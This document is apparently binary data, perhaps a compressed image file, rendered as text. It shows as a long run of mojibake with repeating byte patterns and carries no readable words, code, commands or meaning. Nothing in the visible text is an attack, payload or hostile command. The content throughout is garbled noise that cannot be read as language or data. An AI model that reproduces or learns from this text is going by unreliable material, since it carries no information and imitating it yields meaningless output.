²ÿ”Týƒ¦|(ÿ€uïökþKÏóìïý²ÿýQïßAeÿ(©û^ð£þ׿ٯù-ÿ?ϳ¿ô.ËÿõG¿}—ü¢§ì{ø^ÿf¿ä·üÿ>Îÿл/ÿÕýô_òŠŸ°uï
          ?à{ýšÿ’ßóüû;ÿBì¿ÿT{÷ÐYÊ*~Á×¼(ÿ€uïökþKÏóìïý²ÿýQïßAeÿ(©û^ð£þ׿ٯù-ÿ?ϳ¿ô.ËÿõG¿}—ü¢§ì{øOx™Ÿ(vîBtïJÙauo¶ÏWG¸ñò¨ ´scó°d)p}…ø óظ Û(û1þ´bŒþÕÕü1ù©ŽùKU´7mÝí\%ßOI@Ò&uâ¢dŠ|¶*‰fž’®ŽIUQ´’VYbvC"ÂܶÓfD‘’`'óÐÿÿ¨¤š#áèü{*鎽ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî°TÓAW”Õ1¬°Êº^6½ˆú‚!•”‹‚ ò9ö[»ívý¶Ýí;µªÍa2ée?´FU”Ы
          °GFûý»rÎïc¾ìw¯oº[¾¤uòò ƒPÊÀ•t`U”•`A#«0è=õ´·ÏÇmÌ:‡mÖíš©jvÕÒàV±ÉP]竦¬ËÍ$Œó‰ÜùY™„’DŸ+¯,m,áj‘‘åýþ—™'âËq­—<Ã}Ì××{¶ívónÓ>©KŠ  P*€PÕb3OæWKÒf:¡sQTvõdPïmçA"MXÑÔDD¸Ì\êZ7ßµ1?,.1Huò’¢3۟nÛwhwÍò6kgýÄÃýô?ãékRû›¦‡¿Ìú³Ö¬uuÕTMUU4µ552IQQQQ#Í=Dó;I4ÓM!i%–Y³3X›ž}ä˜UU
           €t_ÓcÿÅ}ùº¸âz…'çýø¯º®¼z‡'çýtêëǨOÿ]z„ÿOöþêz¸àz‚ÿOt=\yõO£°ÿˆ÷^®8uOÏúÞèxþ}\pë&//”Àe1Ù¼F³˜ÄÖAÆdñõÒWPVÒʓSURTÂÉ,Ã*†VR#ÛN‹"”u¡X¨eeaU=lð·æ¶/½ñÔ»TRb{{Ft5¢¤ ß´t‘›)‰‰tErP½m
          <Å䎜»m
          dÆhA6¤þkò?/Cùñߨrd0åöü½ä~v쏢νïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺ÿÐÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¡3«{/'Öy󒥌Öâë’:lÖ(ÉãZÊdbÑKËm#;œ‚,̧†>É·½šæ×Ás¦eÊ7¡óÔ1ö.•Z]5¬šÀª#×ýž¬m÷\nzXê(÷N2†gPdÇæª ÄWÂö»FÐÖËNÉùhZTþŒ}Å7œ¿»Ù9I,—øSùÌòèGí¬¢«(Ðàÿ?òtªþùmùê¶ßþ1ŸýUíîûÿùA›ýá¿ÍÓÞ<ïäý£¯|¶‡üõ[oÿ?˜Ïþª÷ïÝ÷ÿòƒ7ûÛ¯xð¿“ö޽ýòÚóÕm¿üþc?ú«ß¿wßÿÊßï
          þn½ãÁþþOÚ:÷÷ËhÏU¶ÿóùŒÿê¯~ýßÿ(3¼7ùº÷ûù?hëßß-¡ÿ=VÛÿÏæ3ÿª½û÷}ÿü ÍþðßæëÞ<ïäý£¯|¶‡üõ[oÿ?˜Ïþª÷ïÝ÷ÿòƒ7ûÛ¯xð¿“ö޽ýòÚóÕm¿üþc?ú«ß¿wßÿÊßï
          þn½ãÁþþOÚ:÷÷ËhÏU¶ÿóùŒÿê¯~ýßÿ(3¼7ùº÷ûù?hëßß-¡ÿ=VÛÿÏæ3ÿª½û÷}ÿü ÍþðßæëÞ<ïäý£¯|¶‡üõ[oÿ?˜Ïþª÷ïÝ÷ÿòƒ7ûÛ¯xð¿“ö޽ýòÚóÕm¿üþc?ú«ß¿wßÿÊßï
          þn½ãÁþþOÚ:÷÷ËhÏU¶ÿóùŒÿê¯~ýßÿ(3¼7ùº÷ûù?hëßß-¡ÿ=VÛÿÏæ3ÿª½û÷}ÿü ÍþðßæëÞ<ïäý£¯|¶‡üõ[oÿ?˜Ïþª÷ïÝ÷ÿòƒ7ûÛ¯xð¿“ö޽ýòÚóÕm¿üþc?ú«ß¿wßÿÊßï
          þn½ãÁþþOÚ:Oç»g®¶í4•9
          ݅•‘IZLmlZùHý(”x÷¨˜<`¨Հ¹öª×bÝîÜ$VêÀªÍ¨?f~]7%å´b­2þF§öˆoöÍwge¡ñC.?nbÌ£Ž‘”Ìï%–L…yŒ´mY2(T²Bž•$—f”¶
          Š-šÔÁîßâo/ô«ò´œŸ ··vₑü§çþïb‘uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½Ð[ÝÛÒ§®º{³·Í	#µ¶6æÌbËÉüZ“Tø­a3‘ñjàñ~·íc\AøY€?esՐju§­Eê*'ªžjª©¥¨©©–JŠŠ‰äygžy¤–i¥rÏ$²Èř‰$“sîAAãN°û÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è\è]÷ëNæëMHeÁï,•b6*jq•qãó”G>,Ž®xý¦Cí=ÜB{i¢aÅOíòý‡ª¸ÔŒ>]mÉî?误{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è‰ü£ù›_Òóͳzƒ;-h´2C’ÜØÉÖû"–²ŽXa‘u$›Š®šB2
          Ò£kq¬¢ûìܯۆۉÂ0øÈ5íAóó<:Ul®®%Špê“+êê«êê««ªj+k«g𮲲®i*jªêªdiª*jj&gšz‰ærîîK3I$û’‘U€.ó5Éõÿaÿ÷SÀõ~ ¿üWޛ«Ž'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃëØüžG Ëâ+ªñy\ee=~;#AQ-%m
          m,‹55]%L“SÔA2GRX\teWX¤PƒçÖÈ
          °¨#­ƒ~|ÞÆ÷
          '\ö=U'·1Ôº)*›ÅIAØ4”±^Jì|cÇ
          6ã†$/WD€,ŠôãÆ$Š6í´µ™3À	¶?µØô?‘ù†÷
          ¼ÛŸ Lþ3þÇ¡ý½Xײ>Šú÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡¯¦º¦´ªsðUæ*q
          >djjXªŒæ¶J´eq,±hý°µ¯{ûsù&Ȗ¯ºÉâ$R”ô>—X٭ِ+¦ŸÎ½?ì£áç³Ê窓ÿªý†?¯—ônO÷£þnŒ?s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏHÎÅø³û3bîοÏoÃO‡Þ,†!SÆãbÈSSd hZ¢†J¦«¦J¸ŒÉˆEԎ=¹¸7PKÉ·G©M~#þn¬»B+š—û=W—ýÓñ§þgyÿÉ[ÿ±fÿëµ¹ÿѦ÷§ÿ?Oýü7ù³×¿èŸ?óû;ÏþJØ?ýˆ{÷úínôiƒýéÿÏ×¾ƒþü¿ÙëßôOƟùýçÿ%lþÄ=ûýv·?ú4ÁþôÿçëßAÿ
          þ_ìõïú§ãOüþÎóÿ’¶ÿbýþ»[Ÿý`ÿzóõï ÿ†ÿ/öz÷ýÓñ§þgyÿÉ[ÿ±~ÿ]­Ïþ0½?ùú÷Ð×û={þéøÓÿ?³¼ÿ䭃ÿ؇¿®ÖçÿF˜?ޟüý{è?á¿Ëýž½ÿ@ôüiÿŸÙÞòVÁÿìCß¿×ksÿ£LïOþ~½ôðßåþÏ^ÿ z~4ÿÏìï?ù+`ÿö!ïßëµ¹ÿѦ÷§ÿ?^úøoòÿg¯Ð=?çöwŸü•°û÷ïõÚÜÿèÓûÓÿŸ¯}ü7ù³×¿èŸ?óû;ÏþJØ?ýˆ{÷úínôiƒýéÿÏ×¾ƒþü¿ÙëßôOƟùýçÿ%lþÄ=ûýv·?ú4ÁþôÿçëßAÿ
          þ_ìõïú§ãOüþÎóÿ’¶ÿbýþ»[Ÿý`ÿzóõï ÿ†ÿ/öz÷ýÓñ§þgyÿÉ[ÿ±~ÿ]­Ïþ0½?ùú÷Ð×û={þéøÓÿ?³¼ÿ䭃ÿ؇¿®ÖçÿF˜?ޟüý{è?á¿Ëýž½ÿ@ôüiÿŸÙÞòVÁÿìCß¿×ksÿ£LïOþ~½ôðßåþÏ^ÿ z~4ÿÏìï?ù+`ÿö!ïßëµ¹ÿѦ÷§ÿ?^úøoòÿg¯Ð=?çöwŸü•°û÷ïõÚÜÿèÓûÓÿŸ¯}ü7ù³×¿èŸ?óû;ÏþJØ?ýˆ{÷úínôiƒýéÿÏ×¾ƒþü¿ÙëßôOƟùýçÿ%lþÄ=ûýv·?ú4ÁþôÿçëßAÿ
          þ_ìõïú§ãOüþÎóÿ’¶ÿbýþ»[Ÿý`ÿzóõï ÿ†ÿ/öz÷ýÓñ§þgyÿÉ[ÿ±~ÿ]­Ïþ0½?ùú÷Ð×û={þéøÓÿ?³¼ÿ䭃ÿ؇¿®ÖçÿF˜?ޟüý{è?á¿Ëýž½ÿ@ôüiÿŸÙÞòVÁÿìCß¿×ksÿ£LïOþ~½ôðßåþÏ^ÿ z~4ÿÏìï?ù+`ÿö!ïßëµ¹ÿѦ÷§ÿ?^úøoòÿg¯Ð=?çöwŸü•°û÷ïõÚÜÿèÓûÓÿŸ¯}ü7ù³×¿èŸ?óû;ÏþJØ?ýˆ{÷úínôiƒýéÿÏ×¾ƒþü¿ÙëßôOƟùýçÿ%lþÄ=ûýv·?ú4ÁþôÿçëßAÿ
          þ_ìõïú§ãOüþÎóÿ’¶ÿbýþ»[Ÿý`ÿzóõï ÿ†ÿ/öz÷ýÓñ§þgyÿÉ[ÿ±~ÿ]­Ïþ0½?ùú÷Ð×û={þéøÓÿ?³¼ÿ䭃ÿ؇¿®ÖçÿF˜?ޟüý{è?á¿Ëýž½ÿ@ôüiÿŸÙÞòVÁÿìCß¿×ksÿ£LïOþ~½ôðßåþÏ^ÿ z~4ÿÏìï?ù+`ÿö!ïßëµ¹ÿѦ÷§ÿ?^úøoòÿg¯Ð=?çöwŸü•°û÷ïõÚÜÿèÓûÓÿŸ¯}ü7ù³×¿èŸ?óû;ÏþJØ?ýˆ{÷úínôiƒýéÿÏ×¾ƒþü¿ÙëßôOƟùýçÿ%lþÄ=ûýv·?ú4ÁþôÿçëßAÿ
          þ_ìõïú§ãOüþÎóÿ’¶ÿbýþ»[Ÿý`ÿzóõï ÿ†ÿ/öz÷ýÓñ§þgyÿÉ[ÿ±~ÿ]­Ïþ0½?ùú÷Ð×û={þéøÓÿ?³¼ÿ䭃ÿ؇¿®ÖçÿF˜?ޟüý{è?á¿Ëýž¦ãá>ÿñ™~I;Ÿ»j[K\T6Å0LԓÇ:Å8‹jE)†C›K+i&Ä}é½ÙÜØûªâ~½û¾¿èßËýž¬Ïý”|/üöyOüõRõ_²_ëåÇý“ýèÿ›¤ß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³ÕFÿ0ÎòÙ_^^£ê½ã>êî*Ø?ßÇW5ãºÛU
          ¼?w,rÔ-FPôôŸò‰ÍmPÇ,­ÈV{2'ï]ÊÅaÚAìÉÕ1hAæßˆö¯™	g²†
          %,Þbkñ[QQYQ=]\óUUUO-EMMD¯=EEDîòÍ<óJÍ$ÓM#fbY˜’MýÍ PªQÀu±åötÛ'Ôÿ­ÿ_Ó¨r}ØÅ}Ðð=_¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>º£ÈWâk¨ò˜ºÚ¬vOWv?!CQ--m
          m,É=-]%T“SÔÓ̊èèÁ•€ ‚=¶à0*ªFGW 0Š‚:Ù»ùeü¨ëÿ•¿kÒÝǽ_fwÝvåCÑЦ¶1Ԑe—#KM
          õ¢‚&z¼xj£SQKuCOó’î<¾¿¼,lVm³ñdꌟQš¡òo#†ò$ž]š"ÅÒBª|©ZuuŸì£áç³Ê窓ÿªýÇ?×ˏú7'ûÑÿ7LþæO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏHýÿñ»³v~ssAº+ë¥ÄSE:RKާ†9Œ•TôåZD¨v@×à§µûW7ϸnÖMdв*š`ŸO—LÜí‰J%$¯ËçÑKö;蟯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢üÄ~^'Ä·oOLݯØ2Ví¾¸¥™c˜c¦ŽÛ7¼j)¥
          ô›Z–ª6]$®¨¦GV‰¤°÷ÛÞQ<×½¸SûªÜ˜úç¶0|‹k衈5§Inçð#ÇÆxŸòëM¼ÆS%œÉä3YšúÌ®_/]W“Êå252ÖWär5Ó½Umum\ï$õ5uu2´’HìY݉$“ï0#Š8#HaŒ$(ª@€ÀI$œôÇ'üOüWÞú°â>ΡÉõ?ëÄ{oÓ«úuO¯ûø¯º«õÿâ¾ôÝ\q=B“óþ¿üWÝW^=C“óþ¿ºuuãÔ'ÿˆ÷ON®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøzï”Éàòt¬.F»˜ÄVÒäñY\e\ô,fJ‚hê¨rúêY"©£­£©‰dŠXÙ^7PÊAûjDIQã‘F„PAÁGÕÿ‡­Ã?•_ó]Æ|“¡Ãtȵ'ä:Rm}ÓSöô¾ã¢¢†à¾*j秌µM"*őUié€o,ãÇ=r#ìÏ.ë´Æ[i&¬¼L$ÿ†:ð<Wò%·Jdpêõ}Æ7×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷A?y̨Þö¯¦ÿݕ³ÞZÿ’îÝþœÿÇOH÷÷°„uVÞæ¾‚}{ߺ÷^÷î½×½û¯uÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{­=šwuÕvÿË­õ‹†±æÛ=HÉÕû~›WíCY€wmáPbSãû©÷|õ‘4Ÿ©à§…Xú}í~ʛG(ØÊÉK›¿×sòìÇØ#
          iê[×¢Ù<IÈò\Ÿùõ[R~?ØÿÄ{ŸIú…'üOüWÝz¸â>Κe®¢ZŸ´jÊUª`4Óˆ…A¸¸´%ü†ãü=·QŒõ1×>¿ì?â¾èx¯ÔÿŠûÓuqÄõ
          OÏúÿñ_t=]xõOÏúþéÕ׏PŸþ#Ý=:ºõ	þŸíýÔõqÀõþžèz¸óêŸFÿaÿî½\p꟟õ½Ðñüú¸áÔ'ú÷ßÓÝ:pp=A ÿ_Ýz·ŸPäüÿ¾üû¡éÏá꟟õ¿â=Ðõáëª:úìUuS[WÉãjé«ñÙ
          ™¨ë¨+¨æJŠJÚ*ºwŽ¢–®–¢5’9#etu¤¶ÝEtuŒ(AÈ ñyƒÕ¼ÿ.·þTŸÍ–ƒä-.ã¿È¼Í/½¨ibÇì½í],4xþ⦦MÐÖ1SÑv40 Õ´yp‘ŸTMœóÈ­´´»¶Ñm°šº˜¾cÖ?øïŒôԉLŽ_o¸»¦º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{ Ÿ¼¿æTo?ûWÓîʇÙï-ÉwnÿN㧤{‡û‡?Ø?Â:«os_A>½ïÝ{¯{÷^ëÞý׺ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{­÷Îà¨Ý›ÓwnšÇij÷.çÏn
          ©Y̍%Fg+U‘Ùۗg–¤’O'Þ|ÙÛ­¥•¥ª
          $Q"±Tþ‚îuÞ¤ôŒ“ñþÇþ#ÛçÏ«tE¾MwNg–~½ÚuÓcžš·&RŽCsIYÔSâ©j‰)cZIRYwò*ª:)å èSöõ³åötEÚIF•ÝÞVs#HÌÍ#9:‹³’X¹noõ¿´k£wñã¹sK¢Ø›Ÿ!>O”
